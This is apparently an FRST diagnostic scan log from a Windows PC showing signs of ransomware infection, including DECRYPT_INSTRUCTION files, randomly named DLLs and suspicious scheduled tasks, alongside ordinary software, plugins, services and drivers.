BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll (Logitech, Inc.)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Bing Bar Helper -> {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll (Microsoft Corporation.)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll (Logitech, Inc.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - Bing Bar - {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM-x32 - Bing Bar - {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll (Microsoft Corporation.)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Hosts: Hosts file not detected in the default directory
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
 
FireFox:
========
FF ProfilePath: C:\Users\RaRWolf\AppData\Roaming\Mozilla\Firefox\Profiles\g0sikcyb.default-1384639035960
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()
FF Plugin: @esn/npbattlelog,version=2.5.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.1\npbattlelogx64.dll (EA Digital Illusions CE AB)
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @esn.me/esnsonar,version=0.70.4 -> C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\npesnsonar.dll No File
FF Plugin-x32: @esn/npbattlelog,version=2.3.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.3.1\npbattlelog.dll No File
FF Plugin-x32: @esn/npbattlelog,version=2.4.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll (EA Digital Illusions CE AB)
FF Plugin-x32: @esn/npbattlelog,version=2.5.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.1\npbattlelog.dll (EA Digital Illusions CE AB)
FF Plugin-x32: @idsoftware.com/QuakeLive -> C:\ProgramData\id Software\QuakeLive\npquakezero.dll (id Software Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @live.heroesandgenerals.com/npretox -> C:\Program Files (x86)\Heroes & Generals\live\npretoxlive.dll No File
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3503.0728 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @real.com/nppl3260;version=17.0.12.0 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=17.0.12 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=17.0.12.0 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer Cloud)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @TrendMicro.com/FFExtension -> C:\Program Files\Trend Micro\Titanium\UIFramework\Toolbar\firefoxextension\components\npToolbarChrome.dll No File
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin HKCU: @coreonline.com/run3d,version=1.0 -> C:\Users\RaRWolf\AppData\LocalLow\Square Enix\nprun3d.dll (Square Enix)
FF Plugin HKCU: @nsroblox.roblox.com/launcher -> C:\Users\RaRWolf\AppData\Local\Roblox\Versions\version-58bb25d673384171\\NPRobloxProxy.dll ( Roblox Corporation)
FF Plugin HKCU: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\RaRWolf\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF Plugin HKCU: ubisoft.com/uplaypc -> C:\Games\Trials\datapack\orbit\npuplaypc.dll No File
FF Extension: YouTube Center - C:\Users\RaRWolf\AppData\Roaming\Mozilla\Firefox\Profiles\g0sikcyb.default-1384639035960\Extensions\jid1-cwbvBTE216jjpg@jetpack.xpi [2013-12-23]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2014-07-14]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: Logitech SetPoint - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2014-07-15]
FF HKLM-x32\...\Firefox\Extensions: [{7C9C2591-51ED-44FA-8D03-450B92643F95}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2014-08-01]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
CHR Profile: C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-03-20]
CHR Extension: (Google Drive) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-03-20]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-24]
CHR Extension: (YouTube) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-03-20]
CHR Extension: (Google Search) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-03-20]
CHR Extension: (YouTube Center) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\nahndmkihaedfgkhbpopcpnbdeckeibo [2014-03-20]
CHR Extension: (Google Wallet) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-03-20]
CHR Extension: (Gmail) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-03-20]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe [920736 2012-06-01] ()
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.20\aaHMSvc.exe [951936 2012-06-01] (ASUSTeK Computer Inc.)
R2 AsSysCtrlService; C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.13\AsSysCtrlService.exe [149120 2012-02-17] (ASUSTeK Computer Inc.)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [49152 2013-02-03] () [File not signed]
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)
R2 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9216 2014-02-28] (Hi-Rez Studios) [File not signed]
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R3 KeyIso; C:\Windows\SysWOW64\keyiso.dll [43520 2012-07-25] (Microsoft Corporation)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [377616 2014-08-08] (LogMeIn, Inc.)
S2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation)
S3 Netlogon; C:\Windows\SysWOW64\netlogon.dll [634368 2012-07-25] (Microsoft Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1720608 2014-07-25] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [18956064 2014-07-25] (NVIDIA Corporation)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76152 2014-06-30] ()
S2 PSI_SVC_2_x64; c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe [336824 2010-11-30] (arvato digital services llc)
S2 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39568 2014-07-24] ()
S2 RealPlayer Cloud Service; C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin\rpdsvc.exe [1141848 2014-08-01] (RealNetworks, Inc.)
S2 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [23552 2014-07-24] () [File not signed]
S2 RzKLService; C:\Program Files (x86)\Razer\Razer Game Booster\RzKLService.exe [106472 2013-09-18] (Razer Inc.)
S2 RzMaelstromVADStreamingService; C:\ProgramData\Razer\Synapse\Devices\Razer Surround\Driver\RzMaelstromVADStreamingService.exe [4250624 2014-06-09] (A-Volute) [File not signed]
S3 StorSvc; C:\Windows\SysWOW64\storsvc.dll [18432 2012-07-25] (Microsoft Corporation)
R2 TabletServiceWacom; C:\Windows\system32\Wacom_Tablet.exe [3647272 2009-03-26] (Wacom Technology, Corp.)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [14920 2013-01-28] (Microsoft Corporation)
R2 WTabletServicePro; C:\Program Files\Tablet\Wacom\WTabletServicePro.exe [635160 2014-04-21] (Wacom Technology, Corp.)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AiCharger; C:\Windows\SysWow64\drivers\AiCharger.sys [14848 2012-03-22] (ASUSTek Computer Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [13440 2010-08-24] ()
R1 AsUpIO; C:\Windows\SysWow64\drivers\AsUpIO.sys [14464 2010-08-03] ()
S3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdW86.sys [98744 2013-04-23] (Advanced Micro Devices)
S2 atksgt; C:\Windows\System32\DRIVERS\atksgt.sys [312480 2014-04-24] ()
R3 dtsoftbus01; C:\Windows\System32\drivers\dtsoftbus01.sys [283200 2013-05-26] (DT Soft Ltd)
S1 fsthvckq; C:\Windows\system32\drivers\fsthvckq.sys [55104 2014-10-19] (Microsoft Corporation)
R3 hamachi; C:\Windows\system32\DRIVERS\Hamdrv.sys [46136 2014-09-04] (LogMeIn Inc.)
R3 LcUvcUpper; C:\Windows\system32\DRIVERS\LcUvcUpper.sys [34408 2013-10-14] (Microsoft Corporation)
R3 Linksys_adapter_H; C:\Windows\system32\DRIVERS\AE2500w764.sys [1254464 2011-03-28] (Broadcom Corporation)
R2 lirsgt; C:\Windows\System32\DRIVERS\lirsgt.sys [43168 2014-04-24] ()
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-05-12] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2014-05-12] (Malwarebytes Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [20256 2014-07-25] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [40392 2014-03-31] (NVIDIA Corporation)
S3 RTCore64; C:\Program Files (x86)\MSI Afterburner\RTCore64.sys [13368 2013-01-23] ()
R3 RZMAELSTROMVADService; C:\Windows\system32\drivers\RzMaelstromVAD.sys [32768 2014-06-09] (Windows ® Win 7 DDK provider)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [37184 2014-07-15] (Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [129856 2014-07-03] (Razer, Inc.)
U5 UnlockerDriver5; C:\Program Files\Unlocker\UnlockerDriver5.sys [12352 2010-07-01] ()
S3 xusb22; C:\Windows\System32\drivers\xusb22.sys [89088 2012-07-25] (Microsoft Corporation)
S2 AODDriver4.2.0; \??\C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [X]
S1 ririguvw; \??\C:\Windows\system32\drivers\ririguvw.sys [X]
S3 wacommousefilter; \SystemRoot\System32\drivers\wacommousefilter.sys [X]
S3 wacomvhid; \SystemRoot\System32\drivers\wacomvhid.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-22 17:11 - 2014-10-22 17:13 - 00038783 _____ () C:\Users\RaRWolf\Downloads\FRST.txt
2014-10-22 17:11 - 2014-10-22 17:11 - 00000000 ____D () C:\Users\RaRWolf\Downloads\FRST-OlderVersion
2014-10-21 18:40 - 2014-10-21 18:40 - 00032720 _____ () C:\Users\RaRWolf\Desktop\attach.txt
2014-10-21 18:40 - 2014-10-21 18:39 - 00021892 _____ () C:\Users\RaRWolf\Desktop\dds.txt
2014-10-21 18:35 - 2014-10-21 18:35 - 00688992 ____R (Swearware) C:\Users\RaRWolf\Downloads\dds.com
2014-10-21 18:29 - 2014-10-21 18:29 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Running With Rifles 0.98.4
2014-10-19 21:20 - 2014-10-19 21:20 - 00055104 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fsthvckq.sys
2014-10-19 21:17 - 2014-10-19 21:21 - 00005062 _____ () C:\Windows\SysWOW64\rsslogs.20141019211656
2014-10-19 21:11 - 2014-10-19 21:14 - 00003797 _____ () C:\Windows\SysWOW64\rsslogs.20141019211029
2014-10-19 11:45 - 2014-10-19 11:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\PAYDAY
2014-10-19 11:40 - 2014-10-19 11:41 - 00002535 _____ () C:\Windows\SysWOW64\rsslogs.20141019113949
2014-10-18 23:58 - 2014-10-19 10:42 - 00029055 _____ () C:\Windows\SysWOW64\rsslogs.20141018235802
2014-10-18 19:10 - 2014-10-19 11:39 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Ifylqyte
2014-10-18 19:07 - 2014-10-18 20:42 - 00003246 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1557230296-4363482-4078292831-1002
2014-10-18 19:06 - 2014-10-18 20:42 - 00003376 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1557230296-4363482-4078292831-1002
2014-10-18 19:03 - 2014-10-22 17:00 - 00000844 _____ () C:\Windows\Tasks\Security Center Update - 3324824421.job
2014-10-18 19:03 - 2014-10-18 19:03 - 00003820 _____ () C:\Windows\System32\Tasks\Security Center Update - 3324824421
2014-10-18 19:00 - 2014-10-18 23:58 - 00376141 _____ () C:\Windows\SysWOW64\rsslogs.20141018185920
2014-10-18 18:49 - 2014-10-18 18:49 - 00003160 _____ () C:\Windows\System32\Tasks\{1E3340DC-06B1-483A-AA5F-84CF6DD5E40A}
2014-10-18 18:47 - 2014-10-18 18:47 - 00192999 _____ () C:\Users\RaRWolf\Downloads\inform633_win32.zip
2014-10-18 18:36 - 2014-10-18 18:36 - 00253546 _____ () C:\Users\RaRWolf\Downloads\inform6.zip
2014-10-18 18:04 - 2014-10-18 18:05 - 08119386 _____ () C:\Users\RaRWolf\Downloads\I7_6L38_Windows.exe
2014-10-18 10:50 - 2014-10-22 17:00 - 00000844 _____ () C:\Windows\Tasks\Security Center Update - 3847798286.job
2014-10-18 10:50 - 2014-10-18 10:50 - 00003820 _____ () C:\Windows\System32\Tasks\Security Center Update - 3847798286
2014-10-17 19:54 - 2014-10-17 19:58 - 00005058 _____ () C:\Windows\SysWOW64\rsslogs.20141017195335
2014-10-17 17:32 - 2014-10-17 17:36 - 00006318 _____ () C:\Windows\SysWOW64\rsslogs.20141017173148
2014-10-17 17:27 - 2014-10-17 17:27 - 00000000 __SHD () C:\found.000
2014-10-17 07:36 - 2014-10-22 17:00 - 00000848 _____ () C:\Windows\Tasks\Security Center Update - 2903558157.job
2014-10-17 07:36 - 2014-10-17 07:36 - 00003824 _____ () C:\Windows\System32\Tasks\Security Center Update - 2903558157
2014-10-16 18:00 - 2014-10-16 18:00 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\by Decepticon
2014-10-16 15:41 - 2014-10-16 20:17 - 00349655 _____ () C:\Windows\SysWOW64\rsslogs.20141016154014
2014-10-16 15:35 - 2014-10-22 17:00 - 00000844 _____ () C:\Windows\Tasks\Security Center Update - 3029572363.job
2014-10-16 15:35 - 2014-10-16 15:35 - 00003820 _____ () C:\Windows\System32\Tasks\Security Center Update - 3029572363
2014-10-16 15:34 - 2014-10-22 17:00 - 00000932 _____ () C:\Windows\Tasks\Security Center Update - 258622643.job
2014-10-16 15:34 - 2014-10-16 15:34 - 00003908 _____ () C:\Windows\System32\Tasks\Security Center Update - 258622643
2014-10-16 15:25 - 2014-10-22 17:00 - 00000934 _____ () C:\Windows\Tasks\Security Center Update - 1765064875.job
2014-10-16 15:25 - 2014-10-21 18:36 - 00000272 _____ () C:\Users\RaRWolf\INSTALL_TOR.URL
2014-10-16 15:25 - 2014-10-16 15:25 - 00003910 _____ () C:\Windows\System32\Tasks\Security Center Update - 1765064875
2014-10-16 15:03 - 2014-10-16 15:03 - 00045442 _____ () C:\Windows\SysWOW64\rsslogs.20141016150239
2014-10-16 12:04 - 2014-10-16 12:04 - 00223097 _____ () C:\Windows\SysWOW64\rsslogs.20141016120406
2014-10-16 07:06 - 2014-10-16 12:04 - 00375584 _____ () C:\Windows\SysWOW64\rsslogs.20141016070501
2014-10-16 01:10 - 2014-10-16 01:10 - 00452714 _____ () C:\Windows\SysWOW64\rsslogs.20141016011028
2014-10-15 11:43 - 2014-10-16 01:09 - 01117862 _____ () C:\Windows\SysWOW64\rsslogs.20141015114230
2014-10-15 01:10 - 2014-10-15 11:42 - 00821065 _____ () C:\Windows\SysWOW64\rsslogs.20141015011027
2014-10-14 20:12 - 2014-10-15 01:10 - 00376136 _____ () C:\Windows\SysWOW64\rsslogs.20141014201145
2014-10-13 21:01 - 2014-10-13 21:02 - 07600226 _____ () C:\Users\RaRWolf\Downloads\ACBF_THEME.ZIP
2014-10-13 18:14 - 2014-10-13 18:14 - 00000000 ____D () C:\Windows\LastGood.Tmp
2014-10-12 22:17 - 2014-10-12 22:17 - 00002776 _____ () C:\Windows\System32\Tasks\CCleanerSkipUAC
2014-10-12 22:16 - 2014-10-12 22:17 - 00000000 ____D () C:\Program Files\CCleaner
2014-10-12 22:16 - 2014-10-12 22:16 - 04965896 _____ (Piriform Ltd) C:\Users\RaRWolf\Downloads\ccsetup418 (1).exe
2014-10-12 22:16 - 2014-10-12 22:16 - 00000829 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-10-12 22:16 - 2014-10-12 22:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-10-12 05:55 - 2014-10-12 05:57 - 00000000 ____D () C:\reg value hkus
2014-10-12 00:25 - 2014-10-12 00:25 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Plarium
2014-10-12 00:24 - 2014-10-12 00:22 - 04378864 _____ (Piriform Ltd) C:\Users\RaRWolf\Downloads\cc_setup.exe
2014-10-11 23:31 - 2014-10-11 23:33 - 00800688 _____ ( ) C:\Users\RaRWolf\Downloads\CCleaner_Setup.exe
2014-10-11 23:31 - 2014-10-11 23:33 - 00800688 _____ ( ) C:\Users\RaRWolf\Downloads\CCleaner_Setup (1).exe
2014-10-11 11:46 - 2014-10-11 11:46 - 01121208 _____ () C:\Users\RaRWolf\Downloads\ProcessMonitor.zip
2014-10-10 14:05 - 2014-10-10 14:24 - 00000000 ____D () C:\Users\RaRWolf\Zomboid
2014-10-10 12:55 - 2014-10-10 12:55 - 00081408 _____ () C:\Users\RaRWolf\AppData\Roaming\qxigf.dll
2014-10-10 12:55 - 2014-10-10 12:55 - 00047104 _____ () C:\Users\RaRWolf\AppData\Roaming\dbrmh.dll
2014-10-10 12:55 - 2014-10-10 12:55 - 00004060 _____ () C:\Windows\System32\Tasks\{AE7C3D4A-D84F-FFE7-69BB-457B9C83DCAC}
2014-10-10 12:55 - 2014-10-10 12:55 - 00000000 _____ () C:\Users\RaRWolf\AppData\Roaming\nzhmwb.dll
2014-10-10 08:07 - 2014-10-10 08:07 - 00000000 ____D () C:\ProgramData\E1802384DB2718039F19F24F4594560F
2014-10-10 07:58 - 2014-10-10 07:58 - 00000000 ____D () C:\Users\RaRWolf\Documents\GameMaker
2014-10-10 07:57 - 2014-10-10 08:07 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\gamemaker_studio
2014-10-10 07:57 - 2014-10-10 07:57 - 00000000 ____D () C:\ProgramData\gamemaker_studio
2014-10-09 16:51 - 2014-10-22 17:12 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Skype
2014-10-08 21:59 - 2014-10-18 20:41 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\AIMP3
2014-10-08 21:03 - 2014-10-08 21:04 - 07718830 _____ () C:\Users\RaRWolf\Downloads\aimp_3.50.1224_beta_1.zip
2014-10-08 18:45 - 2014-10-08 18:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Stykz Help
2014-10-08 18:41 - 2014-10-08 18:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stykz
2014-10-08 18:40 - 2014-10-08 18:41 - 09890335 _____ () C:\Users\RaRWolf\Downloads\Install_Stykz (1).zip
2014-10-07 19:44 - 2014-10-07 19:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2014-10-07 19:43 - 2014-10-07 19:43 - 01677920 _____ (Skype Technologies S.A.) C:\Users\RaRWolf\Downloads\SkypeSetup.exe
2014-10-07 18:53 - 2014-10-14 20:08 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-07 18:52 - 2014-10-07 18:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-07 18:52 - 2014-10-07 18:52 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-07 18:52 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-07 18:52 - 2014-05-12 07:26 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-07 18:52 - 2014-05-12 07:25 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-07 18:44 - 2014-10-07 18:45 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\RaRWolf\Downloads\mbam-setup-2.0.2.1012.exe
2014-10-07 02:32 - 2014-10-21 18:36 - 00008516 _____ () C:\Users\RaRWolf\DECRYPT_INSTRUCTION.HTML
2014-10-07 02:32 - 2014-10-21 18:36 - 00004198 _____ () C:\Users\RaRWolf\DECRYPT_INSTRUCTION.TXT
2014-10-07 02:32 - 2014-10-07 02:32 - 00000276 _____ () C:\Users\RaRWolf\DECRYPT_INSTRUCTION.URL
2014-10-06 22:50 - 2014-10-06 22:50 - 01887384 _____ ( ) C:\Users\RaRWolf\Downloads\Pivot_v4-1.exe
2014-10-06 22:38 - 2014-10-06 22:38 - 00027448 _____ () C:\Users\RaRWolf\Downloads\12197798227.zip
2014-10-06 22:29 - 2014-10-06 22:30 - 07085849 _____ () C:\Users\RaRWolf\Downloads\1208036521.zip
2014-10-06 22:29 - 2014-10-06 22:30 - 02304925 _____ () C:\Users\RaRWolf\Downloads\1208088047.zip
2014-10-06 22:17 - 2014-10-06 22:17 - 00008224 _____ () C:\Users\RaRWolf\Documents\DECRYPT_INSTRUCTION.HTML
2014-10-06 22:17 - 2014-10-06 22:17 - 00004156 _____ () C:\Users\RaRWolf\Documents\DECRYPT_INSTRUCTION.TXT
2014-10-06 22:17 - 2014-10-06 22:17 - 00000276 _____ () C:\Users\RaRWolf\Documents\DECRYPT_INSTRUCTION.URL
2014-10-06 22:16 - 2014-10-08 18:48 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\._LiveCode_
2014-10-06 22:15 - 2014-10-08 18:47 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Stykz
2014-10-06 22:15 - 2014-10-06 22:15 - 00000000 ____D () C:\Users\RaRWolf\Documents\Animations
2014-10-06 22:12 - 2014-10-06 22:14 - 09890335 _____ () C:\Users\RaRWolf\Downloads\Install_Stykz.zip
2014-10-06 21:48 - 2014-10-06 21:48 - 00008224 _____ () C:\Users\RaRWolf\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-10-06 21:48 - 2014-10-06 21:48 - 00008224 _____ () C:\Users\RaRWolf\AppData\DECRYPT_INSTRUCTION.HTML
